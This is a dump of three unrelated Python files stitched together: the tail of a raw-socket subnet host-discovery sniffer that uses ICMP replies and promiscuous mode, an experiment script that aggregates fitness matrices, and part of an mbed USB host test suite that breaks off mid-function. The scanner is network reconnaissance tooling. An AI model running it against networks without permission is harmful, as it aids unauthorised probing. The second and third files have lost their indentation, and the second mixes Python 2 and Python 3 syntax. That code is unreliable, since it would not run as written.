            # Parse the first 32 bytes of the buffer as an IP header (64-bit)
            ip_header = IP(raw_buffer[0:32])
            # print("Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address))
            # If it is ICMP, inspect it further
            if ip_header.protocol == "ICMP":
                # Calculate where the ICMP packet starts
                offset = ip_header.ihl * 4
                buf = raw_buffer[offset:offset + sizeof(ICMP)]
                # Parse the ICMP data
                icmp_header = ICMP(buf)
                # print("ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code))
                # Check that both type and code are 3, which indicates destination unreachable
                if icmp_header.code == 3 and icmp_header.type == 3:
                    # Confirm the responding host is within our target subnet
                    if IPAddress(ip_header.src_address) in IPNetwork(subnet):
                        # Confirm the ICMP payload contains our magic string
                        if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message:
                            print("Host Up: %s" % ip_header.src_address)
# handle CTRL-C
except KeyboardInterrupt:
        # Turn off promiscuous mode on Windows
        if os.name == "nt":
            sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
# Example output:
# Host Up: 192.168.1.188
driver()
|
get_file.py
|
import os
import sys
import threading
import numpy as np
'''
This file generates the matrix avg, matrix max, and matrix min used for plotting fitness.
Before running this script, please check the parameters below:
1. Rootdir : contains your root directory path
2. Dataset : dataset name that you want to use
3. SavedFileName : filename to save
The results of this script are matrix avg, max, & min with the format:
- Matrix Avg : targetDir+'/matrixAvg-(#-Running)-(TypeofXprmt).csv'
- Matrix Max : targetDir+'/matrixMax-(#-Running)-(TypeofXprmt).csv'
- Matrix Min : targetDir+'/matrixMin-(#-Running)-(TypeofXprmt).csv'
'''
def getfile(rootdir, dataset):
#rootdir = '/home/banua/xprmt/xprmt-icacsis16/0008/'
#dataset = 'jamu'
targetDir = '/home/banua/xprmt/xprmt-icacsis16/'+dataset
matrixMax = np.array([])
matrixFitness = np.zeros((101, 1))
# print 'Please Wait..'
for i in os.listdir(rootdir):
for j in os.listdir(rootdir+i):
if dataset in j:
tcounter = 0
for x in os.listdir(rootdir+i+'/'+j):
# print '.'
if 'gen-' in x:
tcounter += 1
splitkata = x.split('-')
fname = rootdir+i+'/'+j+'/'+x+'/hofFitness.csv'
hof = np.loadtxt(fname, delimiter=',')
matrixFitness[int(splitkata[1])] = hof[0]
# print matrixFitness
status = False
for k in range(0, 10):
if matrixFitness[k] < matrixFitness[k+1]:
status = False
                        print(j, ' ', i)
break
                    else:
                        status = True
                if not status:
matrixMax = np.hstack([matrixMax, np.asarray(matrixFitness)]) if matrixMax.size else np.asarray(matrixFitness)
# print matrixFitness
    print(matrixMax.shape)
np.savetxt(targetDir + '/matrixMax-' + dataset + '-1.csv', matrixMax, fmt='%.5e', delimiter='\t')
try:
# (threading.Thread(target=getfile, args=('/home/banua/xprmt/xprmt-icacsis16/0007/', 'jamu'))).start()
(threading.Thread(target=getfile, args=('/home/banua/xprmt/xprmt-icacsis16/0001/', 'maccs'))).start()
(threading.Thread(target=getfile, args=('/home/banua/xprmt/xprmt-icacsis16/0001/', 'zoo'))).start()
except:
print "Error: unable to start thread"
|
pyusb_basic.py
|
"""
mbed SDK
Copyright (c) 2018-2019 ARM Limited
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
from mbed_host_tests import BaseHostTest
from argparse import ArgumentParser
import time
import sys
import inspect
from threading import Thread, Event, Timer
import array
import random
import os
import traceback
import usb.core
from usb.util import build_request_type
from usb.util import CTRL_OUT, CTRL_IN
from usb.util import CTRL_TYPE_STANDARD, CTRL_TYPE_CLASS, CTRL_TYPE_VENDOR
from usb.util import (CTRL_RECIPIENT_DEVICE, CTRL_RECIPIENT_INTERFACE,
CTRL_RECIPIENT_ENDPOINT, CTRL_RECIPIENT_OTHER)
from usb.util import (DESC_TYPE_DEVICE, DESC_TYPE_CONFIG, DESC_TYPE_STRING,
DESC_TYPE_INTERFACE, DESC_TYPE_ENDPOINT)
import struct
if sys.platform.startswith('win'):
# Use libusb0 on Windows. libusb1 implementation for Windows
# does not support all features necessary for testing.
import usb.backend.libusb0
USB_BACKEND = usb.backend.libusb0.get_backend()
else:
# Use a default backend on other platforms.
USB_BACKEND = None
def get_interface(dev, interface, alternate=0):
intf = None
for active_if in dev.get_active_configuration():
if active_if.bInterfaceNumber == interface and active_if.bAlternateSetting == alternate:
assert intf is None, "duplicate interface"
intf = active_if
return intf
VENDOR_TEST_CTRL_IN = 1
VENDOR_TEST_CTRL_OUT = 2
VENDOR_TEST_CTRL_NONE = 3
VENDOR_TEST_CTRL_IN_DELAY = 4
VENDOR_TEST_CTRL_OUT_DELAY = 5
VENDOR_TEST_CTRL_NONE_DELAY = 6
VENDOR_TEST_CTRL_IN_STATUS_DELAY = 7
VENDOR_TEST_CTRL_OUT_STATUS_DELAY = 8
VENDOR_TEST_CTRL_IN_SIZES = 9
VENDOR_TEST_CTRL_OUT_SIZES = 10
VENDOR_TEST_RW_RESTART = 11
VENDOR_TEST_ABORT_BUFF_CHECK = 12
VENDOR_TEST_UNSUPPORTED_REQUEST = 32
REQUEST_GET_STATUS = 0
REQUEST_CLEAR_FEATURE = 1
REQUEST_SET_FEATURE = 3
REQUEST_SET_ADDRESS = 5
REQUEST_GET_DESCRIPTOR = 6
REQUEST_SET_DESCRIPTOR = 7
REQUEST_GET_CONFIGURATION = 8
REQUEST_SET_CONFIGURATION = 9
REQUEST_GET_INTERFACE = 10
REQUEST_SET_INTERFACE = 11
REQUEST_SYNCH_FRAME = 12
FEATURE_ENDPOINT_HALT = 0
FEATURE_DEVICE_REMOTE_WAKEUP = 1
DEVICE_QUALIFIER_DESC_SIZE = 10
DESC_TYPE_DEVICE_QUALIFIER = 0x06
DEVICE_DESC_SIZE = 18
device_descriptor_parser = struct.Struct('BBHBBBBHHHBBBB')
device_descriptor_keys = ['bLength', 'bDescriptorType', 'bcdUSB', 'bDeviceClass',
'bDeviceSubClass', 'bDeviceProtocol', 'bMaxPacketSize0',
'idVendor', 'idProduct', 'bcdDevice', 'iManufacturer',
'iProduct', 'iSerialNumber', 'bNumConfigurations']
CONFIGURATION_DESC_SIZE = 9
configuration_descriptor_parser = struct.Struct('BBHBBBBB')
configuration_descriptor_keys = ['bLength', 'bDescriptorType', 'wTotalLength',
'bNumInterfaces', 'bConfigurationValue',
'iConfiguration', 'bmAttributes', 'bMaxPower']
INTERFACE_DESC_SIZE = 9
interface_descriptor_parser = struct.Struct('BBBBBBBBB')
interface_descriptor_keys = ['bLength', 'bDescriptorType', 'bInterfaceNumber',
'bAlternateSetting', 'bNumEndpoints',
'bInterfaceClass', 'bInterfaceSubClass',
'bInterfaceProtocol', 'iInterface']
ENDPOINT_DESC_SIZE = 7
endpoint_descriptor_parser = struct.Struct('BBBBHB')
endpoint_descriptor_keys = ['bLength', 'bDescriptorType', 'bEndpointAddress',
'bmAttributes', 'wMaxPacketSize', 'bInterval']
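# Illustrative sketch (not part of the original suite): each Struct/keys pair
# above is meant to be used together, e.g. turning the raw 18-byte device
# descriptor returned by a GET_DESCRIPTOR request into a field dictionary.
# The helper name below is an assumption added purely for illustration.
def example_parse_device_descriptor(raw):
    """Unpack an 18-byte device descriptor into a {field_name: value} dict."""
    return dict(zip(device_descriptor_keys,
                    device_descriptor_parser.unpack(raw)))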
ENDPOINT_TYPE_NAMES = {
usb.ENDPOINT_TYPE_BULK: 'BULK',
usb.ENDPOINT_TYPE_CONTROL: 'CONTROL',
usb.ENDPOINT_TYPE_INTERRUPT: 'INTERRUPT',
usb.ENDPOINT_TYPE_ISOCHRONOUS: 'ISOCHRONOUS'}
# Greentea message keys used to notify DUT of test status
MSG_KEY_TEST_CASE_FAILED = 'fail'
MSG_KEY_TEST_CASE_PASSED = 'pass'
MSG_VALUE_DUMMY = '0'
def format_local_error_msg(fmt):
"""Return an error message formatted with the last traceback entry from this file.
The message is formatted according to fmt with data from the last traceback
entry internal to this file. There are 4 arguments supplied to the format
function: filename, line_number, exc_type and exc_value.
Returns None if formatting fails.
"""
try:
exc_type, exc_value, exc_traceback = sys.exc_info()
# A list of 4-tuples (filename, line_number, function_name, text).
tb_entries = traceback.extract_tb(exc_traceback)
# Reuse the filename from the first tuple instead of relying on __file__:
# 1. No need for path handling.
# 2. No need for file extension handling (i.e. .py vs .pyc).
name_of_this_file = tb_entries[0][0]
last_internal_tb_entry = [tb for tb in tb_entries if tb[0] == name_of_this_file][-1]
msg = fmt.format(
filename=last_internal_tb_entry[0],
line_number=last_internal_tb_entry[1],
exc_type=str(exc_type).strip(),
exc_value=str(exc_value).strip(),
)
except (IndexError, KeyError):
msg = None
return msg
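# Illustrative usage (not part of the original code): called from inside an
# `except` block with a format string that may reference any of the four keys
# supplied above, e.g.
#   msg = format_local_error_msg('[{filename}]:{line_number}, error: {exc_value}')
# It returns None when there is no active exception or the formatting fails.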
class PyusbBasicTest(BaseHostTest):
def test_usb_device(self, usb_dev_serial_number, test_fun, **test_fun_kwargs):
"""Find a USB device and execute a testing function.
Search is based on usb_dev_serial_number. If the device is found, the
test_fun is executed with its dev argument set to the device found and
all other kwargs set as specified by test_fun_kwargs.
The DUT is notified with either success, failure or error status.
"""
usb_device = self.find_device(usb_dev_serial_number)
if usb_device is None:
self.notify_error('USB device (SN={}) not found.'.format(usb_dev_serial_number))
return
try:
test_fun(usb_device, **test_fun_kwargs)
self.notify_success()
except RuntimeError as exc:
self.notify_failure(exc)
except usb.core.USBError as exc:
error_msg = format_local_error_msg('[{filename}]:{line_number}, Dev-host transfer error ({exc_value}).')
self.notify_failure(error_msg if error_msg is not None else exc)
def _callback_control_basic_test(self, key, value, timestamp):
serial_number, vendor_id, product_id = value.split(' ')
self.test_usb_device(
usb_dev_serial_number=serial_number,
test_fun=control_basic_test,
log=print,
vendor_id=int(vendor_id),
product_id=int(product_id)
)
def _callback_control_stall_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=control_stall_test,
log=print
)
def _callback_control_sizes_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=control_sizes_test,
log=print
)
def _callback_control_stress_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=control_stress_test,
log=print
)
def _callback_device_reset_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.device_reset_test.send
)
def _callback_device_soft_reconnection_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.device_soft_reconnection_test.send
)
def _callback_device_suspend_resume_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.device_suspend_resume_test.send
)
def _callback_repeated_construction_destruction_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.repeated_construction_destruction_test.send
)
def _callback_ep_test_data_correctness(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_data_correctness,
log=print
)
def _callback_ep_test_halt(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_halt,
log=print
)
def _callback_ep_test_parallel_transfers(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_parallel_transfers,
log=print
)
def _callback_ep_test_parallel_transfers_ctrl(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_parallel_transfers_ctrl,
log=print
)
def _callback_ep_test_abort(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_abort,
log=print
)
def _callback_ep_test_data_toggle(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_data_toggle,
log=print
)
def _callback_reset_support(self, key, value, timestamp):
status = "false" if sys.platform == "darwin" else "true"
self.log("Reset supported: %s" % status)
self.send_kv("placeholder", status)
def find_device(self, serial_number):
# For reliability, retry up to 20 times within 2 seconds.
for _ in range(20):
dev = usb.core.find(custom_match=TestMatch(serial_number), backend=USB_BACKEND)
if dev is not None:
break
time.sleep(0.1)
return dev
def notify_success(self, value=None, msg=''):
"""Report a host side test success to the DUT."""
if msg:
self.log('TEST PASSED: {}'.format(msg))
if value is None:
value = MSG_VALUE_DUMMY
self.send_kv(MSG_KEY_TEST_CASE_PASSED, value)
def notify_failure(self, msg):
"""Report a host side test failure to the DUT."""
self.log('TEST FAILED: {}'.format(msg))
self.send_kv(MSG_KEY_TEST_CASE_FAILED, MSG_VALUE_DUMMY)
def notify_error(self, msg):
"""Terminate the test with an error msg."""
self.log('TEST ERROR: {}'.format(msg))
self.notify_complete(None)
def setup(self):
self.__result = False
self.device_reset_test = device_reset_test(log=print)
self.device_reset_test.send(None)
self.device_soft_reconnection_test = device_soft_reconnection_test(log=print)
self.device_soft_reconnection_test.send(None)
self.device_suspend_resume_test = device_suspend_resume_test(log=print)
self.device_suspend_resume_test.send(None)
self.repeated_construction_destruction_test = repeated_construction_destruction_test(log=print)
self.repeated_construction_destruction_test.send(None)
self.register_callback('control_basic_test', self._callback_control_basic_test)
self.register_callback('control_stall_test', self._callback_control_stall_test)
self.register_callback('control_sizes_test', self._callback_control_sizes_test)
self.register_callback('control_stress_test', self._callback_control_stress_test)
self.register_callback('device_reset_test', self._callback_device_reset_test)
self.register_callback('device_soft_reconnection_test', self._callback_device_soft_reconnection_test)
self.register_callback('device_suspend_resume_test', self._callback_device_suspend_resume_test)
self.register_callback('repeated_construction_destruction_test', self._callback_repeated_construction_destruction_test)
self.register_callback('ep_test_data_correctness', self._callback_ep_test_data_correctness)
self.register_callback('ep_test_halt', self._callback_ep_test_halt)
self.register_callback('ep_test_parallel_transfers', self._callback_ep_test_parallel_transfers)
self.register_callback('ep_test_parallel_transfers_ctrl', self._callback_ep_test_parallel_transfers_ctrl)
self.register_callback('ep_test_abort', self._callback_ep_test_abort)
self.register_callback('ep_test_data_toggle', self._callback_ep_test_data_toggle)
self.register_callback('reset_support', self._callback_reset_support)
def result(self):
return self.__result
def teardown(self):
pass
class TestMatch(object):
def __init__(self, serial):
self.serial = serial
def __call__(self, dev):
try:
return dev.serial_number == self.serial
except ValueError:
return False
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
def raise_if_different(expected, actual, line, text=''):
"""Raise a RuntimeError if actual is different than expected."""
if expected != actual:
raise RuntimeError('[{}]:{}, {} Got {!r}, expected {!r}'.format(__file__, line, text, actual, expected))
def raise_unconditionally(line, text=''):
"""Raise a RuntimeError unconditionally."""
raise RuntimeError('[{}]:{}, {}'.format(__file__, line, text))
def control_basic_test(dev, vendor_id, product_id, log):
get_set_configuration_test(dev, log)
get_set_interface_test(dev, log)
get_status_test(dev, log)
set_clear_feature_test(dev, log)
get_descriptor_test(dev, vendor_id, product_id, log)
set_descriptor_test(dev, log)
def get_set_configuration_test(dev, log):
"""
Test device configuration/deconfiguration
Given an initialized USB (HOST <---> DUT connection established)
When device configuration is checked just after initialization
Then get_configuration returns 1 (default configuration is set)
When device is deconfigured
Then get_configuration returns 0 (no configuration is set)
When each from supported configurations is set
Then the configuration is set correctly
"""
print("<<< get_set_configuration_test >>>")
# check if the default (1) configuration is set
try:
ret = usb.control.get_configuration(dev)
raise_if_different(1, ret, lineno(), 'Invalid configuration.')
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'get_configuration request failed ({}).'.format(str(error).strip()))
cfg = dev.get_active_configuration()
for intf in cfg:
usb.util.release_interface(dev, intf)
# deconfigure the device
try:
ret = dev.set_configuration(0)
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'set_configuration request (deconfigure) failed ({}).'.format(str(error).strip()))
# check if deconfigured
try:
ret = usb.control.get_configuration(dev)
raise_if_different(0, ret, lineno(), 'Invalid configuration.')
print("device deconfigured - OK")
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'get_configuration request failed ({}).'.format(str(error).strip()))
# for every configuration
for cfg in dev:
try:
# set configuration
ret = cfg.set()
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'set_configuration request failed ({}).'.format(str(error).strip()))
# check if configured
try:
ret = usb.control.get_configuration(dev)
raise_if_different(cfg.bConfigurationValue, ret, lineno(), 'Invalid configuration.')
print("configuration {} set - OK ".format(cfg.bConfigurationValue))
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'get_configuration request failed ({}).'.format(str(error).strip()))
# test control data transfer after configuration set
control_data_test(dev, [64, 256], log)
print("") # new line
def get_set_interface_test(dev, log):
"""
Test device interface setting
Given an initialized USB (HOST <---> DUT connection established)
When each altsetting from every supported configuration is set
Then the interface altsetting is set correctly
"""
print("<<< get_set_interface_test >>>")
# for every configuration
for cfg in dev:
cfg.set()
# for every interface
for intf in cfg:
intf.set_altsetting()
altsett = usb.control.get_interface(dev, intf.bInterfaceNumber)
raise_if_different(intf.bAlternateSetting, altsett, lineno(), text='Wrong alternate setting for interface {}'.format(intf.bInterfaceNumber))
print("cfg({}) inteface {}.{} set - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting))
control_data_test(dev, [64, 256], log)
release_interfaces(dev)
restore_default_configuration(dev)
# test control data transfer after default interface restoring
control_data_test(dev, [64, 256], log)
print("") # new line
def get_status_test(dev, log):
"""
Test device/interface/endpoint status
Given an initialized USB (HOST <---> DUT connection established)
When device status is checked
Then status is within allowed values (see status bits description below)
When control endpoint status is checked
Then control endpoint status is 0
When status of each interface from every supported configuration is checked
Then interface status is 0
When status of each endpoint in every allowed device interface/configuration combination is checked
Then endpoint status is 0 (not halted)
"""
print("<<< get_status_test >>>")
# check device status
ret = get_status(dev, CTRL_RECIPIENT_DEVICE)
# Status bits
# ret == 0b01 (D0)Self Powered
# ret == 0b10 (D1)Remote Wakeup
# (D2 - D15 reserved) Must be set to 0
if(ret < 0 or ret > 3):
raise_unconditionally(lineno(), "GET_STATUS on DEVICE failed")
# check endpoint 0 status
ret = get_status(dev, CTRL_RECIPIENT_ENDPOINT, 0)
# Status bits
# ret == 0b1 (D0)endpoint Halt
# (D1 - D15 reserved) Must be set to 0
# endpoint 0 can't be halted ret == 0
raise_if_different(0, ret, lineno(), "GET_STATUS on ENDPOINT 0 should return 0")
# for every configuration
for cfg in dev:
cfg.set()
raise_if_different(cfg.bConfigurationValue, usb.control.get_configuration(dev), lineno(), "Configuration {} set failed".format(cfg.bConfigurationValue))
for intf in cfg:
intf.set_altsetting()
# check interface status
ret = get_status(dev, CTRL_RECIPIENT_INTERFACE, intf.bInterfaceNumber)
# Status bits
# ret == 0b0
# (D0 - D15 reserved) Must be set to 0
if(ret != 0):
raise_unconditionally(lineno(), "GET_STATUS on INTERFACE ({},{}) failed".format(intf.bInterfaceNumber, intf.bAlternateSetting))
print("cfg({}) interface {}.{} status - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting))
# on every ENDPOINT in this altsetting
for ep in intf:
ret = usb.control.get_status(dev, ep)
# Status bits
# ret == 0b1 (D0)endpoint Halt
# (D1 - D15 reserved) Must be set to 0
if(ret >= 1):
raise_unconditionally(lineno(), "GET_STATUS on ENDPOINT {} failed - endpoint halted".format(ep.bEndpointAddress))
print("cfg({}) intf({}.{}) endpoint {} status - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting, ep.bEndpointAddress))
release_interfaces(dev)
restore_default_configuration(dev)
print("") # new line
def set_clear_feature_test(dev, log):
"""
Test set/clear feature on device/interface/endpoint
Given an initialized USB (HOST <---> DUT connection established)
When for each endpoint in every allowed interface/configuration combination the feature is set and then cleared
Then selected feature is set/cleared accordingly
"""
print("<<< set_clear_feature_test >>>")
# TODO:
# test set_feature on device (Remote wakeup feature not supported on DUT side)
# test set_feature on interface (not supported at all)
# for every configuration
for cfg in dev:
cfg.set()
raise_if_different(cfg.bConfigurationValue, usb.control.get_configuration(dev), lineno(), "Configuration {} set failed".format(cfg.bConfigurationValue))
for intf in cfg:
intf.set_altsetting()
# on every ENDPOINT
for ep in intf:
# halt endpoint
try:
usb.control.set_feature(dev, FEATURE_ENDPOINT_HALT, ep)
except usb.core.USBError as err:
raise_unconditionally(lineno(), 'set_feature request (halt) failed for endpoint {} ({}).'.format(ep.bEndpointAddress, str(err).strip()))
# check if endpoint was halted
try:
ret = usb.control.get_status(dev, ep)
except usb.core.USBError as err:
raise_unconditionally(lineno(), 'get_status request failed for endpoint {} ({}).'.format(ep.bEndpointAddress, str(err).strip()))
if(ret != 1):
raise_unconditionally(lineno(), "endpoint {} was not halted".format(ep.bEndpointAddress))
print("cfg({}) intf({}.{}) ep {} halted - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting, ep.bEndpointAddress))
# Control OUT CLEAR_FEATURE on endpoint - unhalt
try:
usb.control.clear_feature(dev, FEATURE_ENDPOINT_HALT, ep)
except usb.core.USBError as err:
raise_unconditionally(lineno(), "clear_feature request (unhalt) failed for endpoint {} ({})".format(ep.bEndpointAddress, str(err).strip()))
# check if endpoint was unhalted
ret = usb.control.get_status(dev, ep)
if(ret != 0):
raise_unconditionally(lineno(), "endpoint {} was not unhalted".format(ep.bEndpointAddress))
print("cfg({}) intf({}.{}) ep {} unhalted - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting, ep.bEndpointAddress))
release_interfaces(dev)
restore_default_configuration(dev)
print("") # new line
def get_descriptor_test(dev, vendor_id, product_id, log):
"""
Test device/configuration/interface/endpoint descriptors
Given an initialized USB (HOST <---> DUT connection established)
When device descriptor is read
Then the descriptor content is valid
When configuration descriptor is read
Then the descriptor content is valid
When interface descriptor is read
Then the error is thrown since it is not directly accessible
When endpoint descriptor is read
Then the error is thrown since it is not directly accessible
"""
print("<<< get_descriptor_test >>>")
# device descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_DEVICE << 8) | (0 << 0), 0, DEVICE_DESC_SIZE)
dev_desc = dict(zip(device_descriptor_keys, device_descriptor_parser.unpack(ret)))
raise_if_different(DEVICE_DESC_SIZE, dev_desc['bLength'], lineno(), text='Wrong device descriptor size.')
raise_if_different(vendor_id, dev_desc['idVendor'], lineno(), text='Wrong vendor ID.')
raise_if_different(product_id, dev_desc['idProduct'], lineno(), text='Wrong product ID.')
except usb.core.USBError:
raise_unconditionally(lineno(), "Requesting device descriptor failed")
# configuration descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_CONFIG << 8) | (0 << 0), 0, CONFIGURATION_DESC_SIZE)
conf_desc = dict(zip(configuration_descriptor_keys, configuration_descriptor_parser.unpack(ret)))
raise_if_different(CONFIGURATION_DESC_SIZE, conf_desc['bLength'], lineno(), text='Wrong configuration descriptor size.')
except usb.core.USBError:
raise_unconditionally(lineno(), "Requesting configuration descriptor failed")
# interface descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_INTERFACE << 8) | (0 << 0), 0, INTERFACE_DESC_SIZE)
raise_unconditionally(lineno(), "Requesting interface descriptor should fail since it is not directly accessible.")
except usb.core.USBError:
log("interface descriptor is not directly accessible - OK")
# endpoint descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_ENDPOINT << 8) | (0 << 0), 0, ENDPOINT_DESC_SIZE)
raise_unconditionally(lineno(), "Requesting endpoint descriptor should fail since it is not directly accessible.")
except usb.core.USBError:
log("endpoint descriptor is not directly accessible - OK")
print("") # new line
def set_descriptor_test(dev, log):
"""
Test descriptor setting
Given an initialized USB (HOST <---> DUT connection established)
When device descriptor is to be set
Then error is thrown since descriptor setting command is not supported by Mbed
"""
print("<<< set_descriptor_test >>>")
# SET_DESCRIPTOR is optional and not implemented in Mbed
# command should fail with no action on device side
# Control OUT SET_DESCRIPTOR
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = REQUEST_SET_DESCRIPTOR
value = (DESC_TYPE_DEVICE << 8) | (0 << 0) # Descriptor Type (H) and Descriptor Index (L)
index = 0 # 0 or Language ID for this request
data = bytearray(DEVICE_DESC_SIZE) # Descriptor data
try:
dev.ctrl_transfer(request_type, request, value, index, data)
raise_unconditionally(lineno(), "set_descriptor request should fail since it is not implemented")
except usb.core.USBError:
log("SET_DESCRIPTOR is unsupported - OK")
print("") # new line
def synch_frame_test(dev, log):
"""
Test sync frame request
Given an initialized USB (HOST <---> DUT connection established)
When a SYNCH_FRAME request is sent for an isochronous endpoint
Then the request succeeds and the device returns a 2-byte frame number
"""
print("<<< synch_frame_test >>>")
# only for isochronous endpoints
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_ENDPOINT)
request = REQUEST_SYNCH_FRAME
value = 0 # Always 0 for this request
index = 1 # Endpoint index
length = 2 # Always 2 for this request (size of return data)
try:
ret = dev.ctrl_transfer(request_type, request, value, index, length)
ret = ret[0] | (ret[1] << 8)
log("synch frame ret: %d" % (ret))
except usb.core.USBError:
raise_unconditionally(lineno(), "SYNCH_FRAME request failed")
print("") # new line
def control_stall_test(dev, log):
"""
Test control endpoint stall on invalid request
Given an initialized USB (HOST <---> DUT connection established)
When unsupported request to control endpoint is to be sent
Then the endpoint is stalled and error is thrown
"""
print("<<< control_stall_test >>>")
# Control OUT stall
try:
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
data = bytearray(64) # Dummy data
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
# Control request with no data stage (Device-to-host)
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
length = 0
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
# Control request with no data stage (Host-to-device)
try:
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
length = 0
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
# Control IN stall
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
length = 255
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
for i in (3, 4, 5):
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = 0x6 # GET_DESCRIPTOR
value = (0x03 << 8) | (i << 0) # String descriptor index
index = 0 # Communication interface
length = 255
resp = dev.ctrl_transfer(request_type, request, value, index, length, 5000)
except usb.core.USBError:
raise_unconditionally(lineno(), "Requesting string failed i: " + str(i))
for i in (6, 7):
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = 0x6 # GET_DESCRIPTOR
value = (0x03 << 8) | (i << 0) # String descriptor index
index = 0 # Communication interface
length = 255
resp = dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Requesting string passed i: " + str(i))
except usb.core.USBError:
log("Requesting string %s failed - OK" % i)
print("") # new line
def control_sizes_test(dev, log):
"""
Test various data sizes in control transfer
Given an initialized USB (HOST <---> DUT connection established)
When control data in each tested size is sent
Then read data should match sent data
"""
list = [1, 2, 3, 7, 8, 9, 15, 16, 17, 31, 32, 33, 63, 64, 65, 127, 128, 129, 255, 256, 257, 511, 512, 513, 1023, 1024, 1025, 2047, 2048]
control_data_test(dev, list, log)
def control_data_test(dev, sizes_list, log):
# Test control requests of various data stage sizes (1,8,16,32,64,255,256,...)
count = 1
for i in sizes_list:
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_OUT_SIZES
value = i # Size of data the device should actually read
index = 0 # Unused - set for debugging only
data = bytearray(os.urandom(i)) # Dummy data
try:
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
except usb.core.USBError:
raise_unconditionally(lineno(), "VENDOR_TEST_CTRL_OUT_SIZES failed ")
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_IN_SIZES
value = 0 # Size of data the device should actually send
index = 0 # Unused - set for debugging only
length = i
try:
ret = dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_if_different(i, len(ret), lineno(), "send/receive data is the wrong size")
for j in range(0, i):
raise_if_different(data[j], ret[j], lineno(), "send/receive data mismatch")
